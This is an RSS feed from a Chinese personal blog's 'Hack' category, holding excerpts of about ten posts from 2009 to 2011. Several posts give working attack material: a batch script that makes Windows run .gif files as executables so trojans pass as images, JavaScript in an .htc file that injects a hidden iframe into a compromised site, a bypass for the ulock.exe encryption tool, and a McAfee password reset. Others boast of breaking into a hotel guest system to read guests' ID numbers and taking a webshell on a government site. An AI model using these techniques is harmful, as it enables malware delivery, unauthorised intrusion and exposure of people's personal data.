<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Alxston Blog ｜小童De部落 &#187; Hack</title>
	<atom:link href="http://www.alxston.com/post/category/hacker/feed" rel="self" type="application/rss+xml" />
	<link>http://www.alxston.com</link>
	<description>临渊羡渔，不如退而结网---Alxston Blog &#38;小童De部落</description>
	<lastBuildDate>Mon, 26 Dec 2011 02:07:19 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>最实用有效的破解ulock.exe</title>
		<link>http://www.alxston.com/post/1410.html</link>
		<comments>http://www.alxston.com/post/1410.html#comments</comments>
		<pubDate>Wed, 02 Nov 2011 06:48:40 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Hack]]></category>
		<category><![CDATA[破解，ulock]]></category>

		<guid isPermaLink="false">http://www.alxston.com/?p=1410</guid>
		<description><![CDATA[话说这款软件短小精悍，出门必备加密武器哈。简单方便不用多说，相关使用说明我贴上来哈。大家有兴趣的看一下， &#160; 使用方法： 1、将此加密工具复制到你的U盘或移动硬盘根目录中（不是放在文件夹中）则可以加密隐藏U盘或移动硬盘上的所有文件.加密后在U盘或移动硬盘中不能看到你的文件只能看到此工具.但不影响你对U盘或移动硬盘的操作,你的新建立文件将在将在下次加密中一并加密.如果你或他人不慎误删除了此工具,放心你加密的文件还在,只要你将此工具再次复制过来用你原来的密码即可打开. 2、将此加密工具放到文件夹中则只加密当前文件夹.需加密多个文件夹则每个文件夹中都得安放本工具,不同的文件夹可用不同的密码,但密码你必须记牢.. 3、此工具也可以在电脑中加密本地分区或本地文件夹。加密后的文件夹如果复制移动到其它电脑上一样需要你的原始密码打后开才能看到文件. 这下使用U盘或移动硬盘的朋友可方便了。再也不怕有人看到你的重要文件了. 破解方法： 第一步：新建一个文本文档,在里面输入以下的文字： 494B5341534D534D 注意:复制内容只是从到D 第二步：然后另存为,在保存的时候,在“保存类型”中选择“所有文件,文件名为: 117789687.v 然后保存 关闭刚才那些文档，找到刚才那个 117789687.v 文件，重命名，把117789687后面的 .v 删除，只用117789687作文件名！ 第三步： 新建一个文件夹并且命名为 Thumbs.dn ，把刚才那个 117789687 复制到 Thumbs.dn 文件夹里面去。把这个 Thumbs.dn 文件夹复制到 你想要破解的那个文件夹中去，要跟那个 ulock 同一个文件夹内，复制进去后会提示你是否替换，再按全部替换就OK了 最后：再打开那个ulock，这时的密码已经是alxston了，哈哈。。。成功！接着你想删除那软件就可以删除拉。自己试试吧。。 如果有兄弟姐妹们还是看不懂的话，本人也己打包好我制作的破解文件，你下载好直接覆盖上去，再输入密码alxston就行了。 下载地址：点我下载 &#160; 看看下面有你感兴趣的文章吗？2011年01月28日 -- 最新2011年PSP3000 6.2完美破解2010年04月11日 -- 上海世博会概况及门票销售2009年12月31日 -- 世界上最难的游戏2010年04月26日 -- 啥叫美丽的姑娘？就是这！2009年11月3日 -- Discuz! 7.0下Wap访问显示图片的研究2010年03月2日 -- 刷西湖呀！刷西湖！爽加累！2010年04月11日 -- 本博文章被转载了？2009年10月30日 -- 马克斯电影程序(MaxCMS)V2.5漏洞]]></description>
		<wfw:commentRss>http://www.alxston.com/post/1410.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>破解加密的Word、Excel、PowerPoint文档</title>
		<link>http://www.alxston.com/post/1379.html</link>
		<comments>http://www.alxston.com/post/1379.html#comments</comments>
		<pubDate>Mon, 05 Sep 2011 08:56:04 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Hack]]></category>
		<category><![CDATA[破解加密，Word、Excel、PowerPoint，文档]]></category>

		<guid isPermaLink="false">http://www.alxston.com/?p=1379</guid>
		<description><![CDATA[当我们拿到一份加密的Word、Excel、PowerPoint文档的时候，肯定要试一些简单的数字字母的组合来尝试猜解。当所有种排列组合都用过无效之后，这时候可以借助一些工具达到破解密码的目的。 　　Office Password Recovery Toolbox就是这样一个工具，它具有破解及时的特点，几乎能在一分钟之类把密码破解出来。它并不利用本地的字典进行破解，而是通过发送密文到远程服务器，由服务器进行运算并进行猜解，并把密钥返回，最后再根据密钥来解出明文。 解密性能测试 　　先来打开软件，选择要进行解密的office文档，可以看出界面很简洁。可供解密的密码有四种，分别为打开密码、写入密码、保护密码和VBA工程密码。 Office密码重置软件界面 　　 Office密码重置软件界面2 软件会自动检测文档所包含的密码，并会给出提示。如果文档没有被加密，就提示“该文档没有密码保护”。当我们需要移除哪个密码，只需在相应的位置点击“移除密码”即可 　　然后会有很多提示，不用理会，几分钟之后会自动猜解出明文，并在文档所在的目录生成一个没有密码保护的文档，打开这个文档里面就是内容了。 Office密码重置过程1 Office密码重置过程2 Office密码重置过程3 可靠性实验 　　笔者电脑里有一份excel文档，用默认的加密方式进行简单的数字加密，然后进行破解。速度非常快，一会就返回了结果。然后笔者用随机的字母加上数字，也是非常迅速。之后干脆用纯符号，就是键盘上数字上面对应的符号，分别进行六位、九位、十一位的加密，均成功解密。 　　这次实验，笔者决定换一种加密方式再进行。可能由于默认的“office97/2000兼容”加密方式有漏洞，于是随机选取了一种加密方式，名字是“RC4,Microsoft Enhanced RSA and AES Cryptographic Provider (Prototype)”因为看起来最长，觉得可能越安全。于是对它进行测试。 　　开始时的六位、九位的数字与字母加密都不成问题，而换成了符号与字母的组合或者符号与数字的组合在八九位加密时就有些吃力了，相当一部分提示“没有找到匹配的密码” 　　于是我们再换一种加密方式“RC4,Microsoft Enhanced DSS and Diffie-Hellman Cryptographic porvider”，换这种加密连123456这样简单的密码都猜解不了了。 破解失败 得出结论 　　当然，再换其它的加密方式都有不同程度的猜解能力，于是不难得出结论：默认的加密方式有缺陷，不管使用多复杂的密码都很容易被破解。而换用别的加密方式，只有部分会被破解。而采用字母+数字+符号的密码，再换用别的加密方式，几乎不会被破解。 　　破解不是目的，就好比矛与盾的对立，只有懂得了攻击原理才会做出更安全的防护。为了防止一些重要资料的外泄，我们一定要放弃默认的兼容加密方式，换用更可靠的加密方式。 下载地址：Office密码重置工具下载 &#160; 看看下面有你感兴趣的文章吗？2010年04月9日 -- 创业思路-年轻人看一下吧！我收藏下。。。2009年11月27日 -- 许嵩《寻雾启示》雾散显身《叹服》下载2009年11月17日 -- PSArt 新闻发布系统0day2009年11月29日 -- MSN Editor 漏洞 (转)2009年11月2日 -- 让你认识灰鸽子&#8211;全面解析2009年11月12日 -- [...]]]></description>
		<wfw:commentRss>http://www.alxston.com/post/1379.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>网络安全</title>
		<link>http://www.alxston.com/post/1149.html</link>
		<comments>http://www.alxston.com/post/1149.html#comments</comments>
		<pubDate>Tue, 25 May 2010 03:27:45 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Hack]]></category>
		<category><![CDATA[安全]]></category>
		<category><![CDATA[网络]]></category>

		<guid isPermaLink="false">http://www.alxston.com/?p=1149</guid>
		<description><![CDATA[朋友拿的服务器站！丢给了我！我晕！现在安全怎么这么差呀！没过二分钟又丢给我700多个站！这能说明什么问题呢！是他太历害了，还是安全防卫太差！看这情况。以后建服务器不用WIN系列呀！ 看看下面有你感兴趣的文章吗？2009年11月30日 -- 对解密ASP木马文件 2009年12月9日 -- 赵本山花两亿买飞机 欢迎客户前来包机或租赁2010年09月9日 -- 《盗梦空间》盗的是什么？2009年11月2日 -- 友情检测网站！2009年11月19日 -- 给你的图片加上‘密码’之CryptaPix篇2009年10月28日 -- oracle 数据备份导出2010年04月9日 -- 破解McAfee保护密码2010年09月13日 -- PSP 6.20官方系统破解教程（附可玩游戏）]]></description>
		<wfw:commentRss>http://www.alxston.com/post/1149.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>任意文件格式制做成木马</title>
		<link>http://www.alxston.com/post/1004.html</link>
		<comments>http://www.alxston.com/post/1004.html#comments</comments>
		<pubDate>Sun, 11 Apr 2010 03:51:01 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Hack]]></category>
		<category><![CDATA[任意文件木马]]></category>

		<guid isPermaLink="false">http://www.alxston.com/?p=1004</guid>
		<description><![CDATA[从网安基地看来一篇有趣的技术文章，先收下了。大家都知道木马有很多，但大多数他的执行格式都是EXE文件来运行的，下面不知道哪位仁兄搞了这么一个技术性，不多说了，看文章！注：（本文不是教你做木马，只是技术研究用） 标题： 任意文件当做木马来运行 你见过gif、jpg、jpeg、bmp等后缀文件当做木马来运行吗？一个小技巧可以把任意后缀文件当做EXE程序文件来运行。 更改exe为gif： @echo off color 1A ECHO Windows Registry Editor Version 5.00&#62;gif.reg ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]&#62;&#62;gif.reg ECHO "Content Type"="application/x-msdownload"&#62;&#62;gif.reg ECHO @="exefile"&#62;&#62;gif.reg regedit /s gif.reg&#62;nul 2&#62;nul del /s gif.reg&#62;nul 2&#62;nul 这个代码保存成.BAT的文件。 先运行这个BAT文件系统会把.GIF文件来当做应用程序来运行 当然我们的木马后缀要换成.GIF 的，嘻嘻。 恢复gif默认： @echo off color 1A ECHO Windows Registry Editor Version 5.00&#62;gif.reg ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]&#62;&#62;gif.reg ECHO "Content Type"="image/gif"&#62;&#62;gif.reg ECHO @="giffile"&#62;&#62;gif.reg regedit /s gif.reg&#62;nul [...]]]></description>
		<wfw:commentRss>http://www.alxston.com/post/1004.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>破解McAfee保护密码</title>
		<link>http://www.alxston.com/post/964.html</link>
		<comments>http://www.alxston.com/post/964.html#comments</comments>
		<pubDate>Fri, 09 Apr 2010 03:45:19 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Hack]]></category>
		<category><![CDATA[McAfee]]></category>
		<category><![CDATA[密码]]></category>

		<guid isPermaLink="false">http://www.alxston.com/?p=964</guid>
		<description><![CDATA[    当你的电脑安装McAfee软件，C盘被保护了，想安装软件都难啊，保护密码又忘记了，这就难为自己了。想删除软件删除不了，想安装也安装不了，注册表也被保护了想修改也改不了。折腾一下，找到解决办法。 方法一：电脑启动时按F8启动到安全模式下，把McAfee的安装文件删除，再启动电脑到正常模式下，到添加/删除程序里删除McAfee&#8212;&#8212;-这是删除。 方法二：电脑启动时按F8启动到安全模式下，运行regedit打开注册表，HKEY_LOCAL_MACHINE\SOFTWARE下找到MACFEE，MACFEE下有UIP、UIPMode、UIPpages这三个子键， UIP为具体的密码内文 mode为加密状况，0为锁定、1则相反 pages就对应的是相关的页面锁定范围 UIP就是MD5加密过的密码. 直接清除掉,再回到卖咖啡那里重新设置密码就OK了. 如果有朋友喜欢这款杀毒软件的话，我给出下载地址，免费的哦！ 如果还有朋友为找不到杀毒软件而烦恼，可以看一下这个网站有7-8年了，还挺稳定的，里面杀毒软件常见都有的，免费的哦！好像话题有点扯远了！ http://www.luckfish.net 看看下面有你感兴趣的文章吗？2009年11月27日 -- 用U盘就可以清除XP系统管理员密码2009年11月19日 -- 给你的图片加上‘密码’之CryptaPix篇2009年10月28日 -- ADSL与路由器密码查询大全及配置方法2009年10月26日 -- 优酷视频密码破解！无密码照样看视频!]]></description>
		<wfw:commentRss>http://www.alxston.com/post/964.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>学习ARP原理及防御</title>
		<link>http://www.alxston.com/post/941.html</link>
		<comments>http://www.alxston.com/post/941.html#comments</comments>
		<pubDate>Thu, 08 Apr 2010 15:49:11 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Hack]]></category>
		<category><![CDATA[ARP]]></category>

		<guid isPermaLink="false">http://www.alxston.com/?p=941</guid>
		<description><![CDATA[                                  最近突然想到我不会用ARP命令，失败呀！网上搜罗了一下！找到了一些资料，好好学习研究一下！最主要是实践！好了，不多说了，好好看看下面的说明吧！至于防御大家可以360里自带的ARP攻击欺骗防御！ （网摘） 　1．arp的工作原理 　　本来我不想在此重复那些遍地都是的关于arp的基本常识，但是为了保持文章的完整性以及照顾初学者，我就再啰嗦一些文字吧，资深读者可以直接跳过此节。 　　我们都知道以太网设备比如网卡都有自己全球唯一的MAC地址，它们是以MAC地址来传输以太网数据包的，但是它们却识别不了我们IP包中的IP地址，所以我们在以太网中进行IP通信的时候就需要一个协议来建立IP地址与MAC地址的对应关系，以使IP数据包能发到一个确定的地方去。这就是arp(Address Resolution Protocol，地址解析协议)。 　　讲到此处，我们可以在命令行窗口中，输入 　　arp –a 　　来看一下效果，类似于这样的条目 　　210.118.45.100    00-0b-5f-e6-c5-d7    dynamic 　　就是我们电脑里存储的关于IP地址与MAC地址的对应关系，dynamic表示是临时存储在arp缓存中的条目，过一段时间就会超时被删除(xp/2003系统是2分钟)。 　　这样一来，比如我们的电脑要和一台机器比如210.118.45.1通信的时候，它会首先去检查arp缓存，查找是否有对应的arp条目，如果没有，它就会给这个以太网络发ARP请求包广播询问210.118.45.1的对应MAC地址，当然，网络中每台电脑都会收到这个请求包，但是它们发现210.118.45.1并非自己，就不会做出相应，而210.118.45.1就会给我们的电脑回复一个ARP应答包，告诉我们它的MAC地址是xx-xx-xx-xx-xx-xx,于是我们电脑的arp缓存就会相应刷新,多了这么一条： 　　210.118.45.1   xx-xx-xx-xx-xx-xx   dynamic 　　为什么要有这么一个arp缓存呢，试想一下如果没有缓存，我们每发一个IP包都要发个广播查询地址，岂不是又浪费带宽又浪费资源？ 　　而且我们的网络设备是无法识别ARP包的真伪的，如果我们按照arp的格式来发送数据包，只要信息有效计算机就会根据包中的内容做相应的反应. 　　试想一下,如果我们按照ARP响应包的相应的内容来刷新自己的arp缓存中的列表，嘿嘿，那我们岂不是可以根据这点在没有安全防范的网络中玩些ARP包的小把戏了？在后面的文章里我就手把手来教你们如何填充发送arp包，不过先别急，我们再继续学点基础知识^_^ 　　　      2.1　ARP工作过程 　　 　　当一个基于TCP/IP的应用程序需要从一台主机发送数据给另一台主机时，它把信息分割并封装成包，附上目的主机的IP地址。然后，寻找IP地址到实际MAC地址的映射，这需要发送ARP广播消息。当ARP找到了目的主机MAC地址后，就可以形成待发送帧的完整以太网帧头。最后，协议栈将IP包封装到以太网帧中进行传送。 　　 　　如图1所示，描述了ARP广播过程。 　　 　 　　图1　 ARP广播 　　 　　在图1中，当主机A要和主机B通信（如主机A Ping主机B）时。主机A会先检查其ARP缓存内是否有主机B的MAC地址。如果没有，主机A会发送一个ARP请求广播包，此包内包含着其欲与之通信的主机的IP地址，也就是主机B的IP地址。当主机B收到此广播后，会将自己的MAC地址利用ARP响应包传给主机A，并更新自己的ARP缓存，也就是同时将主机A的IP地址/MAC地址对保存起来，以供后面使用。主机A在得到主机B的MAC地址后，就可以与主机B通信了。同时，主机A也将主机B的IP地址/MAC地址对保存在自己的ARP缓存内。 　　 　　2.2　ARP报文格式 　　 　　ARP报文被封装在以太网帧头部中传输，如图2所示，是ARP请求协议报文头部格式。 　　 　 　　图2　 ARP请求协议报文头部格式 　　 　　图2中黄色的部分是以太网（这里是Ethernet II类型）的帧头部。其中，第一个字段是广播类型的MAC地址：0XFF-FF-FF-FF-FF-FF，其目标是网络上的所有主机。第二个字段是源MAC地址，即请求地址解析的主机MAC地址。第三个字段是协议类型，这里用0X0806代表封装的上层协议是ARP协议。 　　 　　接下来是ARP协议报文部分。其中各个字段的含义如下： 　　 　　硬件类型：表明ARP实现在何种类型的网络上。 　　 　　协议类型：代表解析协议（上层协议）。这里，一般是0800，即IP。 [...]]]></description>
		<wfw:commentRss>http://www.alxston.com/post/941.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>无线宽带“蹭网卡” 使用感受</title>
		<link>http://www.alxston.com/post/937.html</link>
		<comments>http://www.alxston.com/post/937.html#comments</comments>
		<pubDate>Thu, 08 Apr 2010 15:17:44 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Hack]]></category>
		<category><![CDATA[无线宽带]]></category>
		<category><![CDATA[蹭网卡]]></category>

		<guid isPermaLink="false">http://www.alxston.com/?p=937</guid>
		<description><![CDATA[        前段时间帮我公司同事买了一个无线宽带“蹭网卡”用了几次感觉还行。不过总的来说效果不是很理想，没有网上说的那么神乎其乎的。对于一些信号搜索方面有些迟顿，还有对于破解密码这块有些麻烦，虽然有很详细的操作说明。但总体来说不是很理想。价格我入手是140-200多元都有，看不同存储量价格。 具体操作过程有说明书的，我这里就不介绍了！ 这里是破解过程。不过都有光盘配送的。一般我们都把破解过程用虚拟机里进行，这样就可以省着去用电脑开机关机了！ 　　“蹭网”行为涉嫌违法犯罪 　　对“蹭网”行为，晚报律师团成员、浙江红邦律师所姚善挺律师认为，根据《物权法》规定，和用电一样，无线网络信号是物权，未经物权人许可擅自使用属于侵权行为。 　　私自安装网络接收器蹭别人的网络是一种偷窃网络资源的行为，侵犯付费拥有网络资源用户的权益。明知他人以非法占有为目的，而为他人提供技术设备，达到一定数额的，根据盗窃罪的构成要件，可构成盗窃罪。因此，情节严重的“蹭网卡”销售者及使用者均有可能因“盗窃”被追究刑事责任。对被“蹭网”的用户来说，有权要求对方排除妨害，终止侵权行为，有权要求蹭网者赔偿经济损失。律师还说，“蹭网卡”之所以会热卖，主要因为目前无线路由器的密码设置存在漏洞。在技术不完善的情况下，遏制“蹭网”，要通过工商部门的监管来规范市场秩序。 　　“蹭网”者其实自己很受伤 　　其实，“蹭网”者自己也很受伤。如今，人们生活在电子产品包围中，“蹭网”者更是把自己置于高辐射中。“蹭网卡”的灵敏度越高、搜索范围越大，功率肯定也越大。天一数码广场一名女店主曾好心地提醒记者，如果要用“蹭网卡”，最好把天线放置在窗旁，这样既可以增强接收能力，也可以防止受电磁辐射。记者了解到，一般无线网卡的功率为50毫瓦，使用中对人没什么影响，而这种“蹭网卡”为了达到满意的使用效果，功率一般是普通网卡的10倍以上，有的甚至达到1瓦。而国内行业标准上限是100毫瓦。长期在“蹭网卡”旁边工作生活的人，受电磁辐射的影响肯定很大。 　　链接 　　对付“蹭网”者有办法 　　对付“蹭网”者有办法吗?电脑专家告诉记者，有办法的。要确定自己有没有被“蹭网”，可以在无线路由器管理界面中查看本地网络链接，如果显示出的电脑网卡物理地址和自己的不同，那就说明被人“蹭网”了。被“蹭”后可通过以下方式来防止：一是开启WPA加密功能，对自己的无线网络系统加密，而且设置16位以上的密码;二是找到隐藏SSID这一项，选择“是”，这样你的无线网就不会出现在“蹭网卡”搜寻列表里;三是把MAC地址填到无线路由的允许列表中;四是及时查看自己所用流量，发现变化要警惕 看看下面有你感兴趣的文章吗？2010年02月25日 -- 晒一下2010年自己的办公桌位2009年12月9日 -- 火车票新版正式启用 更强大防伪功能2009年12月11日 -- 送给不开心人的话2010年07月11日 -- 亲测windows 7系统分区软件（Acronis Disk Director )2009年11月6日 -- 免费手机短信天气预报与免费发送祝福短信2009年10月28日 -- 杭州小学生制出史上最牛纸船2010年04月11日 -- 任意文件格式制做成木马2010年04月26日 -- 《非诚勿扰》《快乐大本营》停播 ?]]></description>
		<wfw:commentRss>http://www.alxston.com/post/937.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>住了一晚高档酒店，入侵了客房系统！</title>
		<link>http://www.alxston.com/post/874.html</link>
		<comments>http://www.alxston.com/post/874.html#comments</comments>
		<pubDate>Thu, 25 Feb 2010 07:34:25 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Hack]]></category>
		<category><![CDATA[入侵]]></category>
		<category><![CDATA[客房系统]]></category>
		<category><![CDATA[高档酒店]]></category>

		<guid isPermaLink="false">http://www.alxston.com/?p=874</guid>
		<description><![CDATA[     话说那晚真有意思呀！大年初7晚上吧！因为快要上班了，所以找些朋友聚聚，人在异地，没的住呀！结果狠心一把，住好像4星吧。忘记了，反正里面设施挺不错的！（具体地方就不说了）下午的时候玩了4个小时轮滑，真的很累了，不过很爽，还收了一个徒弟。哈哈。。。。好了言归正转，房间有数字电视和电脑！习惯性的打开网站。很想知道一下酒店的IP如何分配的，于是有了第一步查了一下内网IP和路由！看下图：（点击可看大图） 第二，看到内网IP地址和网关IP，就输入查看一下是什么玩意！结果返回是这一个网页！刚开始还以为是网站的服务器！ 第三步，查到总后台登入网页，经过破解得到密码。顺利进入后台，留心的你肯定发现IP地址发生变了！当时也蒙了一下！不过下面可以说明为什么会这样了！接着往下看！ 第四步，既然进了后台，就是下面图。看看功能吧！真的挺多的！嘿嘿 经过查询，才知道原来内部网络IP是由管理员分配过的！所以会这样！ 再展一个功能！可以查到整个酒店房间数，今天有多少人入住，还可以查到入住人身份证号哦！嘿嘿。我们不做坏事的！ 可以看到入住人信息，不小心点了一个人的房间！看到身份证号一男一女！哎，女的86年的男的77年的，这二人晚上肯定要做坏事了！哎。。。。。好在我不是他们隔壁呀！ 看看下面有你感兴趣的文章吗？2011年06月3日 -- 打印机共享设置2010年09月13日 -- PSP 6.20官方系统破解教程（附可玩游戏）2010年09月8日 -- 百度 &#8216;哼唱搜索&#8217; 低调上线2011年09月5日 -- 破解加密的Word、Excel、PowerPoint文档2010年04月20日 -- 右键发送到 ‘桌面快捷方式’ 没了？解决方法！2009年11月7日 -- 2个很有意思的代码2009年10月26日 -- 优酷视频密码破解！无密码照样看视频!2009年12月6日 -- WEBSHELL网站打包方法]]></description>
		<wfw:commentRss>http://www.alxston.com/post/874.html/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>两个挂马的新方法</title>
		<link>http://www.alxston.com/post/717.html</link>
		<comments>http://www.alxston.com/post/717.html#comments</comments>
		<pubDate>Mon, 30 Nov 2009 04:02:44 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Hack]]></category>
		<category><![CDATA[技巧]]></category>
		<category><![CDATA[挂马]]></category>
		<category><![CDATA[网页]]></category>

		<guid isPermaLink="false">http://www.alxston.com/?p=717</guid>
		<description><![CDATA[这里只做技术讨论，不做具体危害的事。如果你要用我的方法去做，我也没办法，呵呵。关于挂马，基本上是在网页原来的代码里加载一个iframe。关于加载iframe，我以前的文章写过几种，这篇文章里再提两个新方法吧。 一、利用htc文件来加载iframe。 百度百科里对htc文件的解释为：从5.5版本开始，Internet Explorer（IE）开始支持Web 行为的概念。这些行为是由后缀名为.htc的脚本文件描述的，它们定义了一套方法和属性，程序员几乎可以把这些方法和属性应用到HTML页面上的任何元素上去。Web 行为是非常伟大的因为它们允许程序员把自定义的功能“连接”到现有的元素和控件，而不是必须让用户下载二进制文件（例如ActiveX 控件）来完成这个功能。Web 行为还是推荐的扩展IE对象模型和控件集的方法。微软在它的开发者站点上的DHTML 行为库栏目里提供了几个定制的Web行为。 这些专业的术语看看就头疼，我们看实际应用。先来看一下vbs写的hello.htc ★ Function Hello() MsgBox "Hello, World!" End Function ★ 我们再来写一个1.htm来调用，代码： ★ ★ 我们把hello.htc和1.htm放在同一个目录下，用ie执行1.htm就会成功弹出一个hello world对话框。如果用vbs来执行的话，中马的人只有ie用户了，用火狐的就漏掉了，我们改成js的，直接用1.htm加载新的hello.htc，新的代码为： ★ function hello() { var O = document.createElement("iframe"); O.width = '0'; O.height = '0'; O.src="http://www.sohu.com"; ownerDocument.body.appendChild(O); //注意看，这里用的是ownerDocument，这是精华。 } ★ 这样你把hello.htc传到对方网站目录下，然后在对方页面里加上就可以成功加载框加了，呵呵。 二、关于swf加载网马的简便做法 用swf直接加载iframe也不是什么新方法了，不过我这里有一个简单做法，用到的软件就是flasm。我已经做好了一个模板，是swf.swf。我们在dos下运行flasm -d swf.swf>swf.flm，如图1所示。 图1 其中flasm -d swf.swf>swf.flm是生成swf.flm，如果不加>swf.flm是直接显示源码了。你只需要改变图1当中的url地址和框架高度就可以了。改变地址后，我们再运行一个命令：flasm -a swf.flm就生成你需要的swf了，如图2所示。 图2 [...]]]></description>
		<wfw:commentRss>http://www.alxston.com/post/717.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>对杭州民政局网站的友情检测</title>
		<link>http://www.alxston.com/post/696.html</link>
		<comments>http://www.alxston.com/post/696.html#comments</comments>
		<pubDate>Sun, 29 Nov 2009 02:02:35 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Hack]]></category>
		<category><![CDATA[友情检测]]></category>
		<category><![CDATA[杭州民政局]]></category>
		<category><![CDATA[网站]]></category>

		<guid isPermaLink="false">http://www.alxston.com/?p=696</guid>
		<description><![CDATA[（拿站前提：不破坏任何网站数据，发现有木马，清除。通知管理员漏洞信息） 哎！其实也是误会呀！很尔然的情况下，朋友丢出一个站的网址，习惯性的进行扫描，检测。 不过让我没有想到的，安全做的真的不怎么样！一进去里面全都是木马！不过没有一个是真正拿到SHELL的！只是上传图片，没有形成WEBSHELL！ 大概步骤是这样的！（具体步骤怕是说到明天也说不完！主要是我检测好长时间才发现漏洞的！） 1：在前台看了半天没有什么可利用的！不一会儿就扫出后台地址和密码！（这只能怪网络公司他们太不负责了！） 2:成功进入后台，本博刚建立不久，给加个链接吧！ 3：在后台我逛了快一个小时了！哎，尽发现别人上传的木马文件（只是一些图片格式，没有正真拿下WEBSHELL），最后想放弃时，漏洞出来了！成功拿下WEBSHELL &#8230;真想感叹一句，世上真的有奇迹呀！ 4：在里面翻看了半天，忽然发一个文件，吓了我一身冷汗！ 哎！看来看去。在服务器里找到管理员QQ。加了他QQ。结果一直不上线，想通知他漏洞信息都没有机会呀！我伤心呀!这什么社会！管理员这么不负责呀！ 算了！拉倒，闪人。。。。。。 看看下面有你感兴趣的文章吗？2009年12月9日 -- 教你如何截取网站全屏图片2009年11月2日 -- 网站源代码我就要看，你能奈我何！2009年11月2日 -- 免费在线制作有趣图片网站 Photo Funia]]></description>
		<wfw:commentRss>http://www.alxston.com/post/696.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

